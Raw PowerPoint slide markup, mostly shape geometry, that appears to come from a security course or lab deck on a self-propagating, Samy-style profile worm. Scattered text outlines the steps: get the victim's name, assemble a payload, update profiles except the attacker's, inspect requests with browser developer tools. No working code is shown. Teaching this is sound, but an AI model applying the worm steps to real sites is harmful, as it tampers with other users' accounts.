                  <a:pt x="76581" y="29463"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="63753" y="29463"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="76282" y="31391"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="76581" y="2946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7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DDDBCAC8-EE3A-58E5-B781-3579F0BC7E7A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7217156" y="1667002"/>
            <a:ext cx="304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Get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name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victim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18">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C220BE3C-17A8-4AEA-C773-11A67B1B1733}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="10323830" y="1603502"/>
            <a:ext cx="330200" cy="321310"/>
            <a:chOff x="10323830" y="1603502"/>
            <a:chExt cx="330200" cy="321310"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="33" name="object 19">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5FEFE7F4-C6A6-2C14-ABA7-1D3587205326}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="10336530" y="1616202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152400" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="104217" y="7534"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="62380" y="28517"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="29394" y="60514"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="7766" y="101096"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="147827"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="7766" y="194559"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="29394" y="235141"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="62380" y="267138"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="104217" y="288121"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="152400" y="295656"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="200582" y="288121"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="242419" y="267138"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="275405" y="235141"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="297033" y="194559"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="304800" y="147827"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="297033" y="101096"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="275405" y="60514"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="242419" y="28517"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="200582" y="753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0">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B18D26B5-4601-9560-92AD-1C19912B53FB}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="10336530" y="1616202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0" y="147827"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="7766" y="101096"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="29394" y="60514"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="62380" y="28517"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="104217" y="7534"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="152400" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="200582" y="7534"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="242419" y="28517"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="275405" y="60514"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="297033" y="101096"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="304800" y="147827"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="297033" y="194559"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="275405" y="235141"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="242419" y="267138"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="200582" y="288121"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="152400" y="295656"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="104217" y="288121"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="62380" y="267138"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="29394" y="235141"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="7766" y="194559"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="14782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21">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F1E1D486-75C1-7781-0C5F-139D54FFD2FE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="10419715" y="159880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22">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{55A5FEBB-0478-3688-CE2F-44C1F18C8B1D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="8842502" y="2883661"/>
            <a:ext cx="330200" cy="321310"/>
            <a:chOff x="8842502" y="2883661"/>
            <a:chExt cx="330200" cy="321310"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="37" name="object 23">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D1C34020-BF39-CCD6-C13A-12B9A03EE7F6}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="8855202" y="2896361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152400" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="104217" y="7534"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="62380" y="28517"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="29394" y="60514"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="7766" y="101096"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="147827"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="7766" y="194559"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="29394" y="235141"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="62380" y="267138"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="104217" y="288121"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="152400" y="295655"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="200582" y="288121"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="242419" y="267138"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="275405" y="235141"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="297033" y="194559"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="304800" y="147827"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="297033" y="101096"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="275405" y="60514"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="242419" y="28517"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="200582" y="753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24">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{35FACEAC-EC97-C44F-BCBE-3F6C0524F1EA}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="8855202" y="2896361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0" y="147827"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="7766" y="101096"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="29394" y="60514"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="62380" y="28517"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="104217" y="7534"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="152400" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="200582" y="7534"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="242419" y="28517"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="275405" y="60514"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="297033" y="101096"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="304800" y="147827"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="297033" y="194559"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="275405" y="235141"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="242419" y="267138"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="200582" y="288121"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="152400" y="295655"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="104217" y="288121"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="62380" y="267138"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="29394" y="235141"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="7766" y="194559"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="14782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25">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4BA31C7B-EB58-712F-DAA6-56B30C79C3EF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8938006" y="287865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26">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2C94EEB9-6259-81DC-A853-900DE2F78CD3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4495800" y="3619372"/>
            <a:ext cx="2973070" cy="489584"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="2973070" h="489585">
                <a:moveTo>
                  <a:pt x="76282" y="31391"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="74352" y="43833"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2970783" y="489457"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2972816" y="477012"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="76282" y="31391"/>
                </a:lnTo>
                <a:close/>
              </a:path>
              <a:path w="2973070" h="489585">
                <a:moveTo>
                  <a:pt x="81152" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="26034"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="69469" y="75310"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="74352" y="43833"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="61849" y="41909"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="63753" y="29463"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="76581" y="29463"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="81152" y="0"/>
                </a:lnTo>
                <a:close/>
              </a:path>
              <a:path w="2973070" h="489585">
                <a:moveTo>
                  <a:pt x="63753" y="29463"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="61849" y="41909"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="74352" y="43833"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="76282" y="31391"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="63753" y="29463"/>
                </a:lnTo>
                <a:close/>
              </a:path>
              <a:path w="2973070" h="489585">
                <a:moveTo>
                  <a:pt x="76581" y="29463"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="63753" y="29463"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="76282" y="31391"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="76581" y="2946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7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{33F013EB-3AF8-5EEA-D4D2-CB51028075A4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7628890" y="3961587"/>
            <a:ext cx="1887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Assemble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payload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2" name="object 28">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{EB05F413-4FCA-A819-711C-60406E421AB0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="9601454" y="3996182"/>
            <a:ext cx="330200" cy="321310"/>
            <a:chOff x="9601454" y="3996182"/>
            <a:chExt cx="330200" cy="321310"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="43" name="object 29">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F515FED3-37DB-E1A9-9269-E0E69A2122C1}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="9614154" y="4008882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152400" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="104217" y="7534"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="62380" y="28517"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="29394" y="60514"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="7766" y="101096"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="147828"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="7766" y="194559"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="29394" y="235141"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="62380" y="267138"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="104217" y="288121"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="152400" y="295656"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="200582" y="288121"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="242419" y="267138"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="275405" y="235141"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="297033" y="194559"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="304800" y="147828"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="297033" y="101096"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="275405" y="60514"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="242419" y="28517"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="200582" y="753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0">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1F49A652-AA6B-BC43-BE9C-A9E03BBB1474}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="9614154" y="4008882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0" y="147828"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="7766" y="101096"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="29394" y="60514"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="62380" y="28517"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="104217" y="7534"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="152400" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="200582" y="7534"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="242419" y="28517"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="275405" y="60514"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="297033" y="101096"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="304800" y="147828"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="297033" y="194559"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="275405" y="235141"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="242419" y="267138"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="200582" y="288121"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="152400" y="295656"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="104217" y="288121"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="62380" y="267138"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="29394" y="235141"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="7766" y="194559"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="14782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31">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{72FF4FA1-BC06-D474-4118-5363AAEE12F7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9696957" y="399148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32">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6AA39B50-0ACB-0AE7-9465-16C734FC5BE0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3352800" y="4259453"/>
            <a:ext cx="2973070" cy="489584"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="2973070" h="489585">
                <a:moveTo>
                  <a:pt x="76282" y="31391"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="74352" y="43833"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2970784" y="489458"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2972816" y="477012"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="76282" y="31391"/>
                </a:lnTo>
                <a:close/>
              </a:path>
              <a:path w="2973070" h="489585">
                <a:moveTo>
                  <a:pt x="81152" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="26035"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="69469" y="75311"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="74352" y="43833"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="61849" y="41910"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="63753" y="29464"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="76581" y="29464"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="81152" y="0"/>
                </a:lnTo>
                <a:close/>
              </a:path>
              <a:path w="2973070" h="489585">
                <a:moveTo>
                  <a:pt x="63753" y="29464"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="61849" y="41910"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="74352" y="43833"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="76282" y="31391"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="63753" y="29464"/>
                </a:lnTo>
                <a:close/>
              </a:path>
              <a:path w="2973070" h="489585">
                <a:moveTo>
                  <a:pt x="76581" y="29464"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="63753" y="29464"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="76282" y="31391"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="76581" y="2946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3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A14F6A19-84AC-F768-E6F5-1932BF855E64}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6418326" y="4558995"/>
            <a:ext cx="567817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want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update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anyone’s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profile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except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for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Samy,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45"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="5"/>
              </a:spcBef>
            </a:pP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</a:t>
            </a:r>
            <a:endParaRPr sz="1800">
              <a:latin typeface="Arial MT"/>
              <a:cs typeface="Arial MT"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="207645" marR="344170">
              <a:lnSpc>
                <a:spcPts val="2160"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="55"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr sz="1800" spc="-5" dirty="0">
                <a:latin typeface="Arial MT"/>
                <a:cs typeface="Arial MT"/>
              </a:rPr>
              <a:t>(You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poke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around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Firefox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developer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tools</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1800" dirty="0">
                <a:latin typeface="Arial MT"/>
                <a:cs typeface="Arial MT"/>
              </a:rPr>
              <a:t> to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figure</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1800" dirty="0">
                <a:latin typeface="Arial MT"/>
                <a:cs typeface="Arial MT"/>
              </a:rPr>
              <a:t> this </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1800" spc="-5" dirty="0">
                <a:latin typeface="Arial MT"/>
                <a:cs typeface="Arial MT"/>
              </a:rPr>
              <a:t>out)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47598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D3D63D9-A0DE-C0D4-A2EC-5DA61E2C7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3724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Self-Propagating</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr spc="-5" dirty="0"/>
              <a:t>Worm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9C9C28EC-50AE-19A2-DB0A-E03B458F103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1723" y="2362200"/>
            <a:ext cx="998220" cy="1266444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17ADBAA4-17DA-A852-F19C-E92DB769C5DF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5603240" y="3609213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my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5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B96B03D7-E636-B717-F5D7-EC6E320ED18C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="3366515" y="882396"/>
            <a:ext cx="5076825" cy="4430395"/>
            <a:chOff x="3366515" y="882396"/>
            <a:chExt cx="5076825" cy="4430395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193EEA1-4893-EE3D-2B94-7B162E630A27}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="4114799" y="1600200"/>
              <a:ext cx="3583304" cy="3098165"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="3583304" h="3098165">
                  <a:moveTo>
                    <a:pt x="1297051" y="1395476"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="0" y="1371600"/>
                  </a:lnTo>
                </a:path>
                <a:path w="3583304" h="3098165">
                  <a:moveTo>
                    <a:pt x="1805939" y="762000"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="1805939" y="0"/>
                  </a:lnTo>
                </a:path>
                <a:path w="3583304" h="3098165">
                  <a:moveTo>
                    <a:pt x="3583051" y="1395476"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="2286000" y="1371600"/>
                  </a:lnTo>
                </a:path>
                <a:path w="3583304" h="3098165">
                  <a:moveTo>
                    <a:pt x="2891790" y="3098165"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="2282952" y="2010156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15C40644-B8AE-47C0-B4C0-FBCA85C1E51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6515" y="2616708"/>
              <a:ext cx="757427" cy="757427"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic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DDA76FC1-7EFF-397D-0742-DCBB43BFDD5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2787" y="882396"/>
              <a:ext cx="755903" cy="755903"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="14" name="object 9">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4E13DA9D-D2FF-889D-355F-8551888DC2A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85531" y="2593847"/>
              <a:ext cx="757427" cy="755903"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="48" name="object 10">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A238AD45-0BF5-5AAA-435A-3627D27CB99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1800" y="4556760"/>
              <a:ext cx="755903" cy="75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4032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D3D63D9-A0DE-C0D4-A2EC-5DA61E2C7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3724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Self-Propagating</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr spc="-5" dirty="0"/>
              <a:t>Worm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D0CCC4A2-2445-F8C0-3502-9AE1DF580A9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1723" y="2362200"/>
            <a:ext cx="998220" cy="1266444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9B74AECA-B2E2-59BC-DF20-2E249B6DD2E7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5603240" y="3609213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my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5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BFFAE008-42C2-8788-FD8A-0D9FA914D2D2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
